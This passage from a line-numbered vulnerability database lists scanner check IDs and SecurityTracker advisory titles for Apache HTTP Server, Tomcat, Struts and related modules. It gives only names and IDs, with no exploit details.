14889| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
14890| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
14891| [103122] Apache Web Server ETag Header Information Disclosure Weakness
14892| [103074] Apache Continuum Cross Site Scripting Vulnerability
14893| [103073] Apache Continuum Detection
14894| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
14895| [101023] Apache Open For Business Weak Password security check
14896| [101020] Apache Open For Business HTML injection vulnerability
14897| [101019] Apache Open For Business service detection
14898| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
14899| [100923] Apache Archiva Detection
14900| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
14901| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
14902| [100813] Apache Axis2 Detection
14903| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
14904| [100795] Apache Derby Detection
14905| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
14906| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
14907| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
14908| [100514] Apache Multiple Security Vulnerabilities
14909| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
14910| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
14911| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
14912| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14913| [72626] Debian Security Advisory DSA 2579-1 (apache2)
14914| [72612] FreeBSD Ports: apache22
14915| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
14916| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
14917| [71512] FreeBSD Ports: apache
14918| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
14919| [71256] Debian Security Advisory DSA 2452-1 (apache2)
14920| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
14921| [70737] FreeBSD Ports: apache
14922| [70724] Debian Security Advisory DSA 2405-1 (apache2)
14923| [70600] FreeBSD Ports: apache
14924| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
14925| [70235] Debian Security Advisory DSA 2298-2 (apache2)
14926| [70233] Debian Security Advisory DSA 2298-1 (apache2)
14927| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
14928| [69338] Debian Security Advisory DSA 2202-1 (apache2)
14929| [67868] FreeBSD Ports: apache
14930| [66816] FreeBSD Ports: apache
14931| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
14932| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
14933| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
14934| [66081] SLES11: Security update for Apache 2
14935| [66074] SLES10: Security update for Apache 2
14936| [66070] SLES9: Security update for Apache 2
14937| [65998] SLES10: Security update for apache2-mod_python
14938| [65893] SLES10: Security update for Apache 2
14939| [65888] SLES10: Security update for Apache 2
14940| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
14941| [65510] SLES9: Security update for Apache 2
14942| [65472] SLES9: Security update for Apache
14943| [65467] SLES9: Security update for Apache
14944| [65450] SLES9: Security update for apache2
14945| [65390] SLES9: Security update for Apache2
14946| [65363] SLES9: Security update for Apache2
14947| [65309] SLES9: Security update for Apache and mod_ssl
14948| [65296] SLES9: Security update for webdav apache module
14949| [65283] SLES9: Security update for Apache2
14950| [65249] SLES9: Security update for Apache 2
14951| [65230] SLES9: Security update for Apache 2
14952| [65228] SLES9: Security update for Apache 2
14953| [65212] SLES9: Security update for apache2-mod_python
14954| [65209] SLES9: Security update for apache2-worker
14955| [65207] SLES9: Security update for Apache 2
14956| [65168] SLES9: Security update for apache2-mod_python
14957| [65142] SLES9: Security update for Apache2
14958| [65136] SLES9: Security update for Apache 2
14959| [65132] SLES9: Security update for apache
14960| [65131] SLES9: Security update for Apache 2 oes/CORE
14961| [65113] SLES9: Security update for apache2
14962| [65072] SLES9: Security update for apache and mod_ssl
14963| [65017] SLES9: Security update for Apache 2
14964| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
14965| [64783] FreeBSD Ports: apache
14966| [64774] Ubuntu USN-802-2 (apache2)
14967| [64653] Ubuntu USN-813-2 (apache2)
14968| [64559] Debian Security Advisory DSA 1834-2 (apache2)
14969| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
14970| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
14971| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
14972| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
14973| [64443] Ubuntu USN-802-1 (apache2)
14974| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
14975| [64423] Debian Security Advisory DSA 1834-1 (apache2)
14976| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
14977| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
14978| [64251] Debian Security Advisory DSA 1816-1 (apache2)
14979| [64201] Ubuntu USN-787-1 (apache2)
14980| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
14981| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
14982| [63565] FreeBSD Ports: apache
14983| [63562] Ubuntu USN-731-1 (apache2)
14984| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
14985| [61185] FreeBSD Ports: apache
14986| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
14987| [60387] Slackware Advisory SSA:2008-045-02 apache
14988| [58826] FreeBSD Ports: apache-tomcat
14989| [58825] FreeBSD Ports: apache-tomcat
14990| [58804] FreeBSD Ports: apache
14991| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
14992| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
14993| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
14994| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
14995| [57335] Debian Security Advisory DSA 1167-1 (apache)
14996| [57201] Debian Security Advisory DSA 1131-1 (apache)
14997| [57200] Debian Security Advisory DSA 1132-1 (apache2)
14998| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
14999| [57145] FreeBSD Ports: apache
15000| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
15001| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
15002| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
15003| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
15004| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
15005| [56067] FreeBSD Ports: apache
15006| [55803] Slackware Advisory SSA:2005-310-04 apache
15007| [55519] Debian Security Advisory DSA 839-1 (apachetop)
15008| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
15009| [55355] FreeBSD Ports: apache
15010| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
15011| [55261] Debian Security Advisory DSA 805-1 (apache2)
15012| [55259] Debian Security Advisory DSA 803-1 (apache)
15013| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
15014| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
15015| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
15016| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
15017| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
15018| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
15019| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
15020| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
15021| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
15022| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
15023| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
15024| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
15025| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
15026| [54439] FreeBSD Ports: apache
15027| [53931] Slackware Advisory SSA:2004-133-01 apache
15028| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
15029| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
15030| [53878] Slackware Advisory SSA:2003-308-01 apache security update
15031| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
15032| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
15033| [53848] Debian Security Advisory DSA 131-1 (apache)
15034| [53784] Debian Security Advisory DSA 021-1 (apache)
15035| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
15036| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
15037| [53735] Debian Security Advisory DSA 187-1 (apache)
15038| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
15039| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
15040| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
15041| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
15042| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
15043| [53282] Debian Security Advisory DSA 594-1 (apache)
15044| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
15045| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
15046| [53215] Debian Security Advisory DSA 525-1 (apache)
15047| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
15048| [52529] FreeBSD Ports: apache+ssl
15049| [52501] FreeBSD Ports: apache
15050| [52461] FreeBSD Ports: apache
15051| [52390] FreeBSD Ports: apache
15052| [52389] FreeBSD Ports: apache
15053| [52388] FreeBSD Ports: apache
15054| [52383] FreeBSD Ports: apache
15055| [52339] FreeBSD Ports: apache+mod_ssl
15056| [52331] FreeBSD Ports: apache
15057| [52329] FreeBSD Ports: ru-apache+mod_ssl
15058| [52314] FreeBSD Ports: apache
15059| [52310] FreeBSD Ports: apache
15060| [15588] Detect Apache HTTPS
15061| [15555] Apache mod_proxy content-length buffer overflow
15062| [15554] Apache mod_include priviledge escalation
15063| [14771] Apache <= 1.3.33 htpasswd local overflow
15064| [14177] Apache mod_access rule bypass
15065| [13644] Apache mod_rootme Backdoor
15066| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
15067| [12280] Apache Connection Blocking Denial of Service
15068| [12239] Apache Error Log Escape Sequence Injection
15069| [12123] Apache Tomcat source.jsp malformed request information disclosure
15070| [12085] Apache Tomcat servlet/JSP container default files
15071| [11438] Apache Tomcat Directory Listing and File disclosure
15072| [11204] Apache Tomcat Default Accounts
15073| [11092] Apache 2.0.39 Win32 directory traversal
15074| [11046] Apache Tomcat TroubleShooter Servlet Installed
15075| [11042] Apache Tomcat DOS Device Name XSS
15076| [11041] Apache Tomcat /servlet Cross Site Scripting
15077| [10938] Apache Remote Command Execution via .bat files
15078| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
15079| [10773] MacOS X Finder reveals contents of Apache Web files
15080| [10766] Apache UserDir Sensitive Information Disclosure
15081| [10756] MacOS X Finder reveals contents of Apache Web directories
15082| [10752] Apache Auth Module SQL Insertion Attack
15083| [10704] Apache Directory Listing
15084| [10678] Apache /server-info accessible
15085| [10677] Apache /server-status accessible
15086| [10440] Check for Apache Multiple / vulnerability
15087|
15088| SecurityTracker - https://www.securitytracker.com:
15089| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
15090| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
15091| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
15092| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
15093| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15094| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15095| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15096| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
15097| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
15098| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
15099| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15100| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
15101| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
15102| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
15103| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
15104| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
15105| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
15106| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
15107| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
15108| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
15109| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
15110| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
15111| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
15112| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15113| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
15114| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15115| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15116| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
15117| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
15118| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
15119| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
15120| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
15121| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
15122| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
15123| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
15124| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
15125| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
15126| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
15127| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
15128| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
15129| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
15130| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
15131| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
15132| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
15133| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
15134| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
15135| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
15136| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
15137| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
15138| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
15139| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
15140| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
15141| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
15142| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
15143| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
15144| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
15145| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
15146| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
15147| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
15148| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
15149| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
15150| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
15151| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
15152| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
15153| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
15154| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
15155| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
15156| [1024096] Apache mod_proxy_http May Return Results for a Different Request
15157| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
15158| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
15159| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
15160| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
15161| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
15162| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
15163| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
15164| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
15165| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
15166| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
15167| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
15168| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
15169| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
15170| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15171| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
15172| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
15173| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
15174| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
15175| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
15176| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15177| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
15178| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
15179| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
15180| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
15181| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
15182| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
15183| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
15184| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
15185| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
15186| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
15187| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
15188| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
15189| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
15190| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
15191| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
15192| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
15193| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
15194| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
15195| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
15196| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
15197| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
15198| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
15199| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
15200| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
15201| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
15202| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
15203| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
15204| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
15205| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
15206| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
15207| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
15208| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
15209| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
15210| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
15211| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
15212| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
15213| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
15214| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
15215| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
15216| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
15217| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
15218| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
15219| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
15220| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
15221| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
15222| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
15223| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
15224| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
15225| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
15226| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
15227| [1008920] Apache mod_digest May Validate Replayed Client Responses
15228| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
15229| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
15230| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
15231| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
15232| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
15233| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
15234| [1008030] Apache mod_rewrite Contains a Buffer Overflow
15235| [1008029] Apache mod_alias Contains a Buffer Overflow
15236| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
15237| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
15238| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
15239| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
15240| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
15241| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
15242| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
15243| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
15244| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
15245| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
15246| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
15247| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
15248| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
15249| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
15250| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
15251| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
15252| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
15253| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
15254| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
15255| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
15256| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
15257| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
15258| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
15259| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
15260| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
15261| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
15262| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
15263| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
15264| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
15265| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
15266| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
15267| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
15268| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
15269| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
15270| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
15271| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
15272| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
15273| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
15274| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
15275| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
15276| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
15277| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
15278| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
15279| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
15280| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
15281| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
15282| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
15283| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
15284| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
15285| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
